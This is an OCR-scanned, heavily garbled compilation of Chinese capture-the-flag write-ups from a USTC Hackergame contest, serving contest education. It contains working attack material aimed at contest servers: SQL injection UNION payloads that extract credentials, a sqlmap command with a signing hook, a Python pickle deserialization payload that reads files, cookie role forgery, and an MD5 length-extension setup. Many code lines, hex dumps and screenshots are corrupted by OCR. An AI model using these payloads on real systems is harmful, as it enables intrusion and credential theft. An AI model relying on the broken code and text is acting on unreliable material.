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本 文档 收集 整理 了 中 国 科学 技术 大 学 第 四 届 信 息 安全 大 赛 的 题解 ， 以 及 来 自 比 赛 和 
手 的 一 些 分 享 。 
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科大 学 生 家 长 的 日 常 


题目 链接 到 一 个 html 文件 ， 查 看 他 的 源 代码 ， 可 以 发 现 跳 转 代码 下 方 有 flag È 


> = 一 nb 

被 入 侵 的 云端 

方法 一 : 用 你 的 计算 机 网 络 知识 分 析 这 个 packet， 可 以 从 中 找到 ip 和 端口 。 
方法 二 : 尝试 用 wireshark 打开 packet， 可 以 查看 里 面 的 ip 和 端口 。 

用 wireshark & import hex 之 前 可 能 需要 做 以 下 操作 进行 格式 上 的 转换 : 

od -Ax -tx1 -v packet >> packet hex 


然后 导入 packet hex PPT 

陶 柯 宁 17 级 

下 载 下 来 是 一 个 二 进 制 文件 。 用 file 查看 毫 无 收获 。 
packet: TeX font metric data (????d) 


怎么 可 能 是 TeX 文件 呢 对 不 对 ~ 用 strings 也 没 找到 flag{} ， 但 是 看 到 了 
__ MACOSX ， 说 明 这 个 文件 内 部 很 有 可 能 包含 在 macOS 下 压缩 的 压缩 文件 (作为 
Mac 用 户 ， 曾 经 被 这 个 文件 夹 坑 过 ) 。 用 binwalk 来 看 看 吧 : 


> binwalk packet 


DECIMAL HEXADECIMAL DESCRIPTION 

42 Ox2A Zip archive data, at least v2.0 to 
extract, name: index.html 

19426 Ox4BE2 Zip archive data, at least v1.0 to 
extract, name: __MACOSX/ 

19481 0x4C19 Zip archive data, at least v2.0 to 
extract, name: __MACOSX/._index.html 

19740 Ox4D1C Zip archive data, at least v2.0 to 
extract, name: 200-offline-sprite.png 

53189 OxCFC5 Zip archive data, at least v2.0 to 
extract, name: __MACOSX/._200-offline-sprite.png 

53424 OxDOBO Zip archive data, at least v2.0 to 
extract, name: 100-offline-sprite.png 

53497 OxDOF9 PNG image, 1233 x 68, 8-bit graysc 
ale, non-interlaced 

56158 OxDB5E Zip archive data, at least v2.0 to 
extract, name: __MACOSX/._100-offline-sprite.png 

56944 OxDE70 End of Zip archive 

果然 ! 加 上 AR CLG BIR AT TTR AG A d RA FX > 这 不 是 被 入 侵 的 云 


e 
端的 入 手 点 ， 这 是 第 二 道 云游 戏 的 。 


可 以 注意 到 ， 第 一 个 zip 数据 是 从 Ox2A 开始 的 ， 那 么 这 个 字 节 前 面 的 数据 是 搞 
什么 的 呢 ? 


请 从 packet 中 分 析出 这 个 网 络 包 的 发 起 主机 的 IP 和 端口 号 。 写 成 如 
flag{192.168.1.1:8080} 的 形式 。 


很 有 可 能 ，packet 前 面 就 是 IP 地址 和 端口 号 。 用 Wireshark 随便 截 个 包 试 试 。 








» Ethernet II, Src: Apple 3f:12:70 (b8:e8:56:3f:12:70), Dst: UttTechn 52:12:55 (fc:2f:ef:52:12:55) 
w Internet Protocol Version 4, Src: 192.168.1.101, Dst: 111.221.29.156 
| 0100 .... = Version: 4 
| . 0101 = Header Length: 20 bytes (5) 
> Differentiated Services Field: 0x00 (DSCP: CS@, ECN: Not-ECT) 
Total Length: 67 
Identification: 0x0000 (0) 
» Flags: 0x02 (Don't Fragment) 
Fragment offset: 0 
Time to live: 64 
Protocol: TCP (6) 
Header checksum: @xeb2e [validation disabled] 
[Header checksum status: Unverified] 
Source: 192.168.1.101 
Destination: 111.221.29.156 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 
|, v Transmission Control Protocol, Src Port: 63041, Dst Port: 443, Seq: 1, Ack: 1, Len: 15 
Source Port: 63041 
Destination Port: 443 
[Stream index: 0] 
[TCP Segment Len: 15] 


Sequence number: 1 (relative sequence number) 
[Next sequence number: 16 (relative sequence number) ] 
Acknowledgment number: 1 (relative ack number) 


Header Length: 32 bytes 
» Flags: 0x018 (PSH, ACK) 


| Sil i ee ce ik T YT 


























0000 fc 2f ef 52 12 55 b8 e8 56 3f 12 70 08 00 45 O00 ./.R.U.. V?.p..E. 

0010 00 00 40 00 40 06 eb 2e cð a8 01 65 6f dd  .C..Q.Q. .....eo. 

f6 41 01 bb 54 9c 07 7d 32 35 07 32 BO 18 ...A..T. .}25.2.. 

c7 e6 00 00 01 01 908 0a 26 99 42 bf 0c a7 ........ ..&.B... 

17 03 03 00 50 27 60 de 21 b9 9c eb bð 9c .q....P" "1... 
a 





这 个 网 络 包 有 三 个 部 分 ， 重 点 看 I|P 和 TCP HRD » IP 部 分 开头 是 45， 长 度 是 20 
个 字 节 ， 接 下 来 就 是 TCP 部 分 的 源 端 口 和 目的 端口 。 我 们 来 看 一 下 packet 的 内 


98 
105 
120 
135 
150 
165 
180 
195 
210 
223 
240 
233 
270 
285 
300 
313 
330 
345 
360 
375 
390 


52 
00 
OA 
04 
00 
65 
35 
EO 
4B 
C6 
AF 
90 
B8 
BB 
71 
E2 
3c 
c9 
92 
F6 
BB 
C8 
CD 
84 
34 
8F 
B7 


54 
DE 
08 
14 
08 
78 
2B 
F7 
70 
4C 
F6 
ES 
CC 
1E 
31 
EE 
29 
D2 
3E 
A3 
D9 
7E 
FO 
E3 
8D 
17 
18 


Signed Int 


flag{10.0. 


08 
78 
61 
00 
00 
2E 
El 
FD 
@D 
03 
CA 
F3 
7A 
59 
48 
ED 
96 
EB 
14 
11 
GA 
Er 
BF 
58 
E8 
A3 
BS 


12 
09 
FF 
08 
oo 
68 
59 
15 
02 
68 
B6 
9D 
3F 
59 
A2 
D7 
5E 
CF 
3D 
AS 
9C 
87 
AF 
7A 
30 
D6 
5B 


35 
1D 
iF 
o0 
08 
74 
ES 
CD 
20 
21 
24 
BD 
B2 
59 
93 
22 
IF 
D2 
4B 
FD 
C6 
FO 
DD 
BD 
EB 
5B 
AD 


02 
00 
BB 
08 
08 
6D 
01 
55 
09 
30 
FB 
B2 
BA 
59 
E2 
F8 
15 
E4 
BB 
B4 
E7 
A8 
9A 
48 
SE 
FQ 
2F 


little © 


EB 
E2 


ED 
FF 
BB 
03 
oo 
55 
20 
01 
04 
9A 
B2 
F8 
co 
59 
77 
3A 
D3 
90 
C9 
E3 
E9 
co 
50 
8B 
5F 
34 
CF 


FA 
11 
DE 
29 
OA 
58 
DD 
98 
60 
EE 
75 
31 
5D 
59 
FB 
4D 
OF 
@D 
52 
DE 
E8 
EE 
BE 
99 
87 
1E 
93 


CE 
00 
64 
4E 
09 
oC 
7D 
83 
3C 
21 
96 
B? 
39 
99 
BS 
8A 
BE 
8B 
37 
74 
D4 
8A 
76 
4E 
26 
1E 
24 


BE 
08 
08 
4B 
10 
09 
6B 
C1 
76 
00 
22 
E4 
E2 
B? 
5B 
38 
6E 
D? 
79 
DE 
78 
B4 
2B 
9E 
06 
A? 
3D 


EF 
OA 
00 
00 
00 
87 
73 
oc 
49 
69 
2C 
EE 
46 
AE 
FC 
EA 
BE 
A3 
96 
89 
12 
E8 
2F 
43 
71 
7D 
3E 


08 
00 
50 
08 
69 
2C 
ic 
1E 
31 
19 
47 
7E 
SA 
7a 
OF 
9C 
EA 
4E 
76 
7B 
8D 
25 
2E 
AS 
B7 
F1 
29 


(select some data) 


O out of 56966 bytes 


00 
61 
4B 
00 
6E 
E1 
c9 
E4 
18 
B1 
F8 
D2 
62 
B3 
FC 
C4 
er 
D6 
92 
C9 
F2 
B? 
7A 
D? 
9B 
83 
E4 


45 
CC 
03 
00 
64 
59 
71 
12 
88 
B6 
FD 
SF 
A6 
4E 
4D 
C3 
A? 
2F 
69 
SA 
64 
6F 
49 
70 
F6 
81 
EF 
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IP 所 在 字 节 是 OA 00 61 CC， 端 口 所 在 字 节 是 1F BB (大 端 序 ) 


97.204:8123} 


S&S /pz 
1 flag 
方法 一 : 肉眼 查找 ， 过 于 耗 时 ， 不 推荐 ; 
方法 二 : 写 程序 处 理 ， 如 一 行 python : 
list(filter(lambda s: bytes(s[1:-1], 'utf-8').isalnum(), \ 


requests.get("http://hack.lug.ustc.edu.cn/file/flag.txt").text.s 
plit('flag'))) 


输出 ['{V2XA7G1Z6H4}'] 


方法 三 : 正则 表达 式 flag Nw*?N) 


骚扰 你 的 一 位 老 学 


打开 

http://www.chenweikeng.com/ 

发 现 底部 有 jemdoc 的 链接 ， 打 开 后 查看 jemdoc 官网 的 文档 得 知 元 信息 位 于 
http://www.chenweikeng.com/index.jemdoc 


打开 在 底部 可 以 找到 flag. 


陶 柯 宁 17 级 
看 着 cwk 的 照片 ， 翻 找 着 网 页 却 不 知 flag 在 何 处 ， 内 心 久久 不 能 平静 。 
我 在 找到 正解 前 党 试 过 : 


,分析 主 页 的 照片 和 音频 ， 企 图 从 中 找到 flag 
EER e m cookie = & 4 flag ° 

,一句 句 看 是 不 是 有 类 似 「 藏 头 诗 」 一 样 的 东西 。 
Book me ! (当然 最 后 还 是 没 敢 book) 
.搜索 owk 学 长 的 论文 。 


ok OND 一 


差点 就 给 学 长 发 骚扰 邮件 索要 flag 7 ...... 
周一 计算 机 导论 课 上 课 前 ， 我 又 不 死 必 打开 cwk 的 网 站 ， 不 知 为 什么 到 了 一 行 


小 字 


Page generated 2017-10-13 22:14:22 PDT, by jemdoc. 


比赛 在 10/14 开始 ， 说 明 在 比赛 前 一 天 网 页 被 修改 过 ( 先 不 考虑 时 差 之 类 的 了 ) > 
但 查看 index.html 却 又 什么 都 没有 ...... 


难道 是 jemdoc ?我 想到 了 以 前 写 jekyll 代码 的 经 历 ， 在 查询 文档 后 发 现 它 的 
后 组 是 .jemdoc ， 所 以 尝试 index.jemdoc ， 就 得 到 flag T ° 


flag{doyouknowvimcreatetempfile} 
fa pik a vim 关系 不 大 。 


CancerGary 17% 校外 同学 
Ad E AORTA ERE (2 


这 题目 实在 是 脑 洞 啊 ! 居然 是 去 http://jemdoc.jaboc.net/ 然后 找到 看 文章 源码 的 方 
法 回来 看 主页 的 源码 | (jemdoc 好 感度 +1) 


不 过 想 想 题目 也 很 科学 ? 有 的 题 还 有 泄露 .git 文 件 夹 的 呢 .……… 


云游 戏 ? | 
预备 步骤 : 得 到 游戏 页 面 
方法 一 : 用 wireshark 导入 包 ， 寻 出 里 面 的 data 为 一 个 压缩 包 
方法 二 : 直接 binwalk， 发 现 压 缩 包 ， 用 压缩 软件 直接 尝试 解压 。 
后 解压 的 压缩 包 为 一 个 文件 夹 ， 里 面 有 小 恐龙 游戏 页 面 
打开 之 后 ， 可 以 浏览 代码 或 与 chrome 原版 小 恐龙 游戏 进行 代码 比较 ， 可 以 看 到 一 


些 关键 的 运算 : 


// Line 678 

// try to gain reward, the constant part of the reward is 2.4657 

676475 

X -= 0.1* this.config.ACCELERATION * (4 * PARAMA * X * X * X - 3 
* PARAM B * X * X); 


De e 
在 脚本 中 找到 这 些 常数 的 值 : 

ACCELERATION: 0.1 

var PARAM_A = 0.943745363; 


var PARAM_B = 2.895467371; 
var X = 5.0; 


可 以 发 现 这 是 一 个 单 变 量 的 梯度 下 降 公 式 ， 我 们 知道 梯度 下 降 实 质 上 是 : 
loop: x -= rate * d(f(x))/dx 

其 中 rate 是 下 降 的 速率 ， 积 分 d(f(x))/dx 并 加 上 提示 中 的 常数 

f(x) = PARAM A * (x ** 4) - PARAM B * (x ** 3) + 2.4657676475 


运行 这 个 梯度 0 EG decade ee 
ART Se A B] FR HAVA SE > an N AGE BEE I BRAY BE RFI ^ EIER 
中 输出 X 的 值 ) ， 待 X 稳 定 后 得 到 : 


x = 2.3010449782539832 
f\(x\) = -6.353530137073035 


flag 即 为 flag{63535301} 


AK ha BE 89 SEAS AR AE 

下 载 文件 后 发 现 文 档 被 加 密 ， 在 Windows 下 右键 -属性 -详细 信息 可 以 看 到 标题 ， 标 
AL BP A flag. 

当然 ， 这 好 像 是 非 预期 解法 ， 预 期 解法 是 用 某 个 联网 的 密码 移 除 器 ，1 元 钱 都 不 

用 ， 就 秒 秒 钟 可 以 去 掉 密码 。 

郑 子 涵 注 : 一 个 能 在 线 解 密 的 工具 https://secure.decryptum.com/demo- 
preview.html?jid=3571496689184429598 


kk oh >) D> 
简单 认证 

查看 首页 注释 ， 发 现 admin.php 

打开 admin.php， 发 现 nobody 是 不 合法 的 ， 需 要 admin 


打开 cookie， 发 现 role=bm9ib2R5 此 即 为 nobody 的 base64 结果 ， 将 其 改 
A admin 的 base64 的 结果 ， 重 新 打开 页 面 ， 即 可 得 到 flag. 


flag 42 wt gs 


flag 521E & 
IDA + F5 反 汇 编 得 到 代码 : 


int __cdecl main(int argc, const char **argv, const char **envp) 
{ 

char v4[17]; // [esp+1Bh] [ebp-15h] 

int i; // [esp+2Ch] [ebp-4h] 


. main(); 
printf("Input your flag:"); 
scanf("%16s", v4); 
for ( i= 0; 1 <= 15; tti ) 
v4[i] A= i; 
if ( !strcmp(v4, aFmcd) ) 
printf("congratulations!"); 
else 
printf("wrong flag!"); 
return 0; 


找到 aFmcd 的 地 址 : 


4 
O 


.rdata:0040303A aFmcd db 'fmcd' ; DATA X 
REF: _main+65to 


.rdata:0040303E db 7Fh ; 
.rdata:0040303F db 57h = W 
.rdata:00403040 db 63h; c 
.rdata:00403041 db 71h ; q 
. rdata:00403042 db 41h ; A 
. rdata: 00403043 db 7Ah ; z 
. rdata: 00403044 db 4Fh ; 0 
.rdata:00403045 db 6Ah ; j 
.rdata:00403046 db 7Fh ; 
.rdata:00403047 db 74h ; 
.rdata:00403048 db 70h ; 
.rdata:00403049 len EE Te 
.rdata:0040304A db 0 


故 比 较 的 字符 串 数 据 为 (前 四 个 就 是 fmcd ) : 
66 6D 63 64 7F 57 63 71 41 7A AF 6A 7F 74 70 72 


EAT — PS RA BRR (HAT te) 即 可 得 到 flag 


此 题 没有 验证 是 否 为 室 ， 去 掉 网 页 上 输入 框 的 readonly 属性 后 ， 可 以 输入 空 的 字符 
串 ， 最 后 的 结果 即 为 md5( 服 务 器 字符 串 + 空 字符 串 )， 结 果 仍然 为 md5( 服 务 器 字 
符 串 )， 这 是 已 知 的， 按照 最 后 一 位 选择 奇偶 即 可 。 


注意 : 一 定 要 小 心 ， 不 要 手 拌 。 


首先 发 现 音 频 为 电话 拨号 音 ， 利 用 DtMf 原理 得 到 拨号 的 内 容 。 得 到 拨号 内 容 之 后 
发 现 是 # 号 分 割 的 ASCI > MRI flag 。 


付 佳 伟 17 级 


我 以 前 编辑 处 理 过 一 些 音频 文件 ， 电 脑 上 装 有 Adobe Audition CC， 所 以 一 看 又 是 
音频 文件 ， 就 直接 用 Au 打开 了 » 


M^ pei D 
> Id 44 ol ce <» [a la ‘@ Q )Q, 0Q 


IF > TTAR RER RAN o 





N 
ARET REL Hii 


, H 
t 
$ j i 
EE] dade Bi 
1 3| ) J 
Hn nu d 
H 


GEBEDEELI. HH 


DEM y MI 


D 





这 就 很 明显 了 吧 ， 画 点 辅助 线 出 来 : 


> Id aa >> bl 





网 上 查 一 下 ， 发 现 就 是 手机 拨号 键 键 盘 发 出 的 声音 。 上 面 三 行 是 列 ， 下 面 四 行 是 
行 ， 从 下 往 上 表示 1~4。 所 以 我 们 慢 慢 来 解码 吧 : 


102#108#97#103#123#68#116#77#102#96#84#111#110#101#125 


看 起 来 都 像 是 ASCII 字 符 编 码 ， 那 就 转换 一 下 


eau 
for i in "102#108#97#103#123#68#116#77#102#96#84#111#110#101#125" 
‚split("#"): 

s += chr(int(i)) 


4 —I N 


最 后 输出 : 


flag{DtMf Tone} 


CancerGary 17% 校外 同学 
DTMF 解 码 http://dialabc.com/sound/detect/ 


我 还 想 手 撕 频 谱 图 ， 实 在 是 太 naive 了 


用 户 名 查询 系统 
此 题 第 一 步 是 分 析 混 淆 后 的 javascript 代码 ， 采 用 打 XHR breakpoint 的 方法 ， 发 
、 
sign = md5(“hackergame15072797441"+s+"1507279744hackergame” ) 
向 服务 器 发 送 的 s= text + "|" + sign 
然后 利用 s 注入 即 可 : 


这 个 注入 是 一 个 很 常规 的 注入 ， 依 次 得 到 数据 库 名 ， 表 名 ， 列 名 即 可 ， 最 后 的 flag 
位 于 admin 的 password 字段 。 


payload("-1 union (SELECT DATABASE() FROM 
INFORMATION SCHEMA.SCHEMATA)") 


数据 库 名 ‘app’ 


payload("-1 union (SELECT GROUP_CONCAT(table_name) FROM 
INFORMATION SCHEMA.TABLES WHERE table schema-'app')") 


& 4 ‘user’ 


payload("-1 union (SELECT GROUP CONCAT (column name) FROM 
INFORMATION SCHEMA.COLUMNS WHERE table schema-'app' AND 
table name-'user')"”) 


字段 名 'id,username,password' 

payload("-1 union (SELECT GROUP_CONCAT(username) FROM app.user)") 
用 户 名 ‘admin,hejiyan’ 
payload("-1 union (SELECT GROUP_CONCAT(password) FROM app.user)") 
密码 : flag{de056e7ae812f8329eab1f829585679c},the author’ 


有 同学 问 可 不 可 以 用 sqlmap? 3 ae ， 明 白 sign 的 生成 之 后 自己 写 一 
salmap 的 tamper 就 好 了 ， 分 分 钟 过 掉 这 道 题 。 


HA F 17 级 


首先 它 会 有 对 input type ^ sign length 和 sign 的 校 验 。 输 入 1 和 2 会 
有 结果 ， 其 它 都 没有 。 查 看 网 络 请 求 可 以 看 到 RD) 


http://hack.lug.ustc.edu.cn/dynamic/2/ajax.php?s-1 | a46ba29bc43e5 
5476733b414ebbfa54e 


很 明显 ， 拿 sqlmap 暴力 瞎 扫 是 不 可 行 的 ， 毕 竞 是 有 校 验 的 (也 发 现 了 sign 
不 是 符号 ， 而 是 签名 (signature) 的 缩写 ) 。 直 接 在 文本 框 中 输入 特殊 符号 会 失败 
( 连 空格 都 不 行 ) 。 


所 以 我 们 只 能 在 JS 代码 上 找 突破 口 ， 但 是 ...... 代码 被 混淆 过 了 。 





流下 了 不 会 JS 的 泪水 


a 其 实在 控制 台 的 帮助 下 ， 我 们 可 以 解 出 一 部 分 的 代码 ， 大 致 看 看 它 到 底 会 做 
什么 。 在 进行 了 一 次 又 一 次 单调 的 工作 之 后 ， 可 以 发 现 : 
1. sign MD5 加 盐 的 。 
2. 数据 过 滤 (特殊 符号 加 上 select 等 SQL 查询 语句 ) 是 在 本 地 进行 的 ， 也 就 
是 说 ， 器 很 可 能 不 会 对 数据 中 的 字符 进行 校 验 。 (不 然 题 目 就 没 法 做 了 ) 


在 我 们 大 致 摘出 来 后 ， 我 们 可 以 破坏 JS 的 本 地 校 验 ， 把 replace 替换 成 这 种 鬼 
样子 : 


Fort (var N= "REGEXD( 222222727222. ),, tos 020, ra el lenge 
Du) 
pero substr’ IE. HI repiace Cmn 22”) 
peturnner — ti weplace nl Select /selact 2 2, 
t= tl neplace’ qp 7 E sselaek 2), 
to= replace] 4 unten Zunein-, =), 
p = tl replaces ]|€ 7 "where? 7 "whare e. 
t= tl replace’ Il 4 password 7 "passward”, =.) 
// WA RABE o MRA ERARA T” AOR PCS 


那么 我 的 思路 就 是 : 使 用 sqlmap 配合 这 段 JS 来 搞 事情 。 


查询 资料 可 知 sglmap A --eval 参数 ， 可 以 插入 自 定义 的 Python 语句。 所 以 
我 们 可 以 用 Python 来 调用 Node.js 来 执行 这 段 JS。 


首先 继续 修改 JS : 将 document["getElementById"]("inputi")["onkeyup"] 
TM” AA Node.js 里 面 没 有 document 。 再 把 XMLHttpRequest 部 分 删 
掉 ， 因 为 我 们 没 必 要 在 JS 里 向 远程 服务 器 发 送 请 求 。 bO 就 直接 把 r 返回 
来 。 最 后 用 npm 安装 一 下 模块 js-md5 ， 在 开头 加 : 


md5 = require('js-md5'); 


来 正常 使 用 md 函数 。 


我 们 希望 用 命令 行 参数 的 形式 向 JS 脚本 发 送 希 望 编码 的 字符 串 ， 所 以 在 原本 
document 的 地 方 加 上 (我 们 用 双 引 号 扩 上 字符 串 ， 以 下 均 在 类 Unix 的 Shell 中 
进行 ) 


console.log(b(process.argv[2])) 


然后 是 写 调 用 Python 脚本 。 安 装 Naked (执行 Node.js WA) 与 
shellescape (处 理 转 义 字符 ) 模块 。 我 们 的 语句 大 致 是 这 个 样子 : 


from Naked.toolshed.shell import muterun_js;from shellescape imp 
ort quote;s = muterun_js("Problem2.js {}".format(quote(s))).stdo 
ut.strip() 


(假设 JS 文件 名 为 Problem2.js) 


接 下 来 上 sglmap 扫 一 通 ， 最 终 的 命令 是 这 个 样子 的 : 


python2.7 /usr/local/bin/sqlmap -u "http://hack.lug.ustc.edu.cn/ 
dynamic/2/ajax.php?s=1" -o -T user -C id,username, password --dum 
p --eval="from Naked.toolshed. shell import muterun_js; from shell 
escape import quote;s = muterun_js(\"Problem2.js {}\".format (quo 
te(s))).stdout.strip()" 


最 后 拿 到 flag: 


flag{de056e7ae812f8329eab1f829585679c} 


CancerGary 17% 校外 同学 
交互 式 注入 工具 ($) 


import requests, hashlib 
while True: 
s=input ( ">>>" 
res=requests.get("http://hack.lug.ustc.edu.cn/dynamic/2/ajax 
.php", params={'s':'{}|{}'.format(s, hashlib.md5(("hackergame15072 
79744%s1507279744hackergame"%s).encode()).hexdigest())}) 
print(res.text) 


Hide and Seek 


这 道 题 其 实 就 是 一 道 很 简单 的 unpickle 漏洞 的 题目 ， 不 过 我 们 稍微 做 了 一 点 变 式 
( 坑 ) ， 只 允许 unpickle 特定 的 东西 ， 具 体 代 码 就 写 在 handies.py Ei: 


import builtins 
import io 
import pickle 


def file_contents(filename, mode='r'): 
"Does what you think it does" 
filename = filename.replace('/','_').replace('..','_') 
with open(filename, mode) as f: 
return f.read() 


class RestrictedUnpickler (pickle.Unpickler): 
def find_class(self, module, name): 
if module != 'handies': 
raise pickle.UnpicklingError("module='%s' 是 非法 的 " 96 


module) 
if name != 'file_contents': 
raise pickle.UnpicklingError("name='%s' 是 非法 的 " % n 
ame) 
if module == "handies" and name == 'file_contents': 


return file_contents 
raise pickle.UnpicklingError("module='%s', name='%s' %3 
法 的 " % (module, name) ) 


def safe_unpickle(s): 
"""Helper function analogous to pickle.loads().""" 
return RestrictedUnpickler(io.BytesIO(s)).load() 


可 以 看 出 safe unpickle 的 时 候 ， 其 实 就 是 检查 了 一 下 unpickle 出 来 的 对 象 ， 只 有 
handies.file contents 是 允许 的 ， 而 且 首 页 上 app.py 向 我 们 展示 了 
file contents 的 功能 ， 就 是 读 取 文 件 内 容 ， 那 么 我 们 就 可 以 构造 参数 读 取 


flag.py 或 者 handies 里 面 的 内 容 。 (也 就 是 说 ， 这 道 题 其 实 做 出 来 之 后 就 
是 开源 的 了 【和 逃 】) 


根据 首页 内 容 ，flag 即位 于 flag.py， 构 造 一 下 即 可 : 


# handies.py 
def file_contests(): 
pass 


# payload.py 
from handies import file_contents 
import base64 

import pickle 


class Payload: 


def _ reduce (self): 


return (file_contents, ('flag.py',)) 


print(base64.b64encode(pickle.dumps(Payload()))) 


执行 payload.py ， 将 参数 带 入 credential 即 可 得 到 flag 的 内 容 。 


邓 胜 元 16 级 
阅读 源 代码 ， 发 现 是 对 参数 'credential' 进 行 bBase64 解 码 然 后 unpickle， 如 果 得 到 的 
是 Credential 的 实例 就 尝试 login、 输 出 flag， 否 则 将 unpickle 的 结果 输出 。 


第 一 反应 就 是 使 其 unpickle 结 果 为 Credential 的 实例 ， 但 是 尝试 一 下 后 发 现 这 被 定 
为 “奇怪 的 操作 ”。 注意 到 提示 3， 另 外 handies 这 个 模块 看 起 来 比较 特殊 ， 猜 测 是 小 
红 自 己 写 的 ， 加 上 file_contents 的 名 字 ， 得 到 思路 : 调用 file_contents 读 取 flag.py。 


阅读 python 文 档 中 关于 pickle 的 部 分 ， 发 现 类 的 reduce 方 法 比较 特殊 ， 如 果 它 返回 
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When a tuple is returned, it must be between two and five items long. 
Optional items can either be omitted, or None can be provided as their value. 
The semantics of each item are in order: 


A callable object that will be called to create the initial version of the object. A 
tuple of arguments for the callable object. An empty tuple must be given ifthe 
callable does not accept any argument. ...... 


那么 我 们 随便 构造 一 个 类 ， 自 己 实现 reduce 方 法 就 好 了 。 


import pickle 
import base64 
import handies 
class SomeClass: 
def reduce (self): 
return handies.file_contents, ('flag.py',) 
print(base64.b64encode(pickle.dumps(SomeClass()))) 


另外 因为 pickle 是 根据 对 象 的 名 字 去 查找 对 象 的 ， 所 以 我 们 只 要 fake 一 个 无 用 的 
handies.file_contents 就 行 了 。 


最 后 的 Url 就 是 : http://67.209.186.120:8888/? 
credential=gANjaGFuZGllewpmaWxlX2NvbnRIlbnRzCnEAWAcAAABmbGFnLnB5 
cQGFcQJScQMu 
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构造 python pickle 
格式 : http://www.freebuf.com/articles/system/89165.html 
ik: 这 题 只 允许 调用 handies .file_contents 


没 改 后 端 代 码 时 尝试 过 _ main .file contents (好 像 也 不 能 这 么 调用 ? ) 
(所 以 仔细 看 文档 的 重要 性 ) 
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付 佳 伟 17 级 


原版 做 法 想必 都 知道 了 ， 直 接 按 F12 找到 文字 框 ， 删 掉 readonly 属性 并 清空 文 
本 框 中 的 内 容 ， 然 后 要 猜 的 MD5 就 是 已 知 的 MD5， 看 最 后 一 个 数字 选 上 就 行 了 。 重 
复 30 次 ， 没 什么 技术 含量 


升级 版 不 能 再 发 送 空 的 text 了 ， 会 被 蔡 换 成 不 允许 为 室 ， 网 上 查阅 资料 发 现 未 知 原 
字符 串 的 情况 下 MD5 碰 撞 是 不 可 能 的 ， 只 能 搜 别 的 办 法 了 。Google 一 会 发 现 有 个 东 
西 叫 Length Extension Attack， 仔 细 研 究 发 现 ，MD5 会 把 数据 按照 64 字 节 (512 位 ) 分 
组 ， 如 果 不 足 会 进行 padding， 并 且 每 一 组 计算 出 的 结果 会 用 于 下 一 组 的 计算 。 这 
意味 着 页 面 给 出 的 MD5 就 是 已 知 的 字符 串 经 过 padding 之 后 计算 出 的 MD5， 可 以 将 
其 用 于 下 一 组 的 计算 。 然 后 就 开始 找 MD5 的 实现 ， 找 到 两 三 个 坏 掉 的 代码 后 发 现 了 
HashPump 这 个 小 工具 ， 是 专门 针对 几 种 常见 的 Hash 进 行 LEA 的 。 


先 考虑 一 下 可 能 用 到 的 工具 并 准备 齐全 


~ $ mkdir guess && cd guess 

~/guess $ sudo apt install curl git libssl-dev grep sed 
~/guess $ git clone https://github.com/bwall/HashPump 
~/guess $ cd HashPump 

~/guess/HashPump $ make 

-/guess/HashPump $ cd .. 

~/guess $ 


在 浏览 器 中 试 几 次 ， 发 现 每 次 都 以 POST 方式 发 送 text, choice 和 submit 三 个 字段 ， 
其 中 submit 的 内 容 永远 是 URL Encode 之 后 的 提交 两 个 字 ， 决 定 直接 硬 编码 ， 而 
text 则 是 文本 框 中 的 随机 文字 ，choice 是 0 或 1， 对 应 猜测 偶数 和 奇数 。 


AR curl 来 试 一 下 返回 页 面 的 结构 


curl --cookie cookie.txt --cookie-jar cookie.txt "http://hack.lu 
g.ustc.edu.cn/dynamic/4/" -X POST -d "Submit=%E6%8F%9O%E4%BA%A4" 


<div> 
<h3> 上 一 回合 < 
+ 的 字 +: <code>UoxFevboJPEWsUKtzBbeaGLDJIfMt5yDZ</code></p> 
: <code>609b627dadc7cc28c2365381e6772ac5</code></p> 
«code» fi 12° </code></p> 
<code>UoxFevboJPEWsUKtzBbeaGLD]JfMt5yDZ 不 允许 为 室 </code></py> 
f: <code>47</code></p> 


f ! Combo 归 和 零 </b></p> 
</div> 


<div> 
<h3> 新 从 r«/h3» 
<p>} "D5: <code>08269ae5d6a510815166c89a4d498de7</code></p> 


<form action= method="POST™> 
<p> 你 的 随机 字符 串 : "" size-"50" /></p> 
«p» 人 
<p> 
<label><input name-"choice" type="radio" value="®" checked />1 
<label><input name-"choice" type="radio" value= 
</p> 
<p><input type="submit" name-"submit" value=" 
</form> 
</div> 


<script> 
var text = 
var p "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdeftghi jk1mnopqrstuvwxyz0123456789" ; 
for(var i=®;i<32;i++) 
text«-possible.charAt(Math.floor(Math.random()*possible.length)); 
document.getElementById("text").value-text; 
</script> 
</body> 
</html> 





看 起 来 不 错 ， 页 面 结 构 固 定 ， 但 是 里 面包 含 了 至 少 三 个 MD5 字 符 串 ， 我 们 需要 提取 
用 来 猜测 的 那个 。 首 先 确 定 一 下 行 号 


curl --cookie cookie.txt --cookie-jar cookie.txt "http://hack.lu 
g.ustc.edu.cn/dynamic/4/" -X POST -d "Submit=%E6%8F%9O%E4%BA%A4" 
| cat -n 


<div> 


<code>J3SzfFXWNphGTurue6t732B8pFSWUpVE</code></p> 
<code>@8269ae5d6a510815166c89a4d498de7</code></p> 


6t732B8pFSWUpVE 不 允许 为 空 </code></py> 


code»4dea4a366ff31e7e5aad7ac8cc9a195«b»«u»f«/u»«/b»«/code»«/p» 


p> 
Combo 5E « /b»«/p» 


的 回合 </h3> 
器 的 MD5: <code>88582ae4d9e5db5a27759e37e5823210</code></p> 


method="POST"> 
j <input readonly id-"text" type="text" name-"text" value-"" size-"50" /></p> 
I) {JMD Rtt: </p> 


<label><input name-"choice" type="radio" value 
<label><input name-"choice" type="radio" value 
</p> 
<p><input type="submit" name-"submit" value="{i26"></p> 
</form> 
</div> 


<script> 
var text = ""; 
var possible "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdeftghi jk1mnopqrstuvv 0123456789"; 
for(var i-0; Zz 
text+=possible.charAt(Math.floor(Math.random()*possible. length) ); 
document. getElementById(“text") .value=text; 
</script> 


i++) 





很 好 ，48 行 就 是 我 要 的 那个 MD5 > grep 提取 出 来 备用 


HASH=$(curl --cookie cookie.txt --cookie-jar cookie.txt "http:// 
hack.lug.ustc.edu.cn/dynamic/4/" -X POST -d "Submit=%E6%8F%90%E4 
%BA%A4" | sed -n "48p" | grep -oE '[0-9a-f]{32}') 


简单 起 见 在 LEA 的 补充 数据 部 分 , 我 就 补 一 个 a RT , 反正 是 任意 数据 " 接 
下 来 调试 HashPump， 发现 直接 指定 data 为 空 的 时 候 还 是 要 求 输入 data， 果 断 给 它 
一 个 EOF ( Ctrl + D )， 然 后 猜测 一 下 试 一 试 


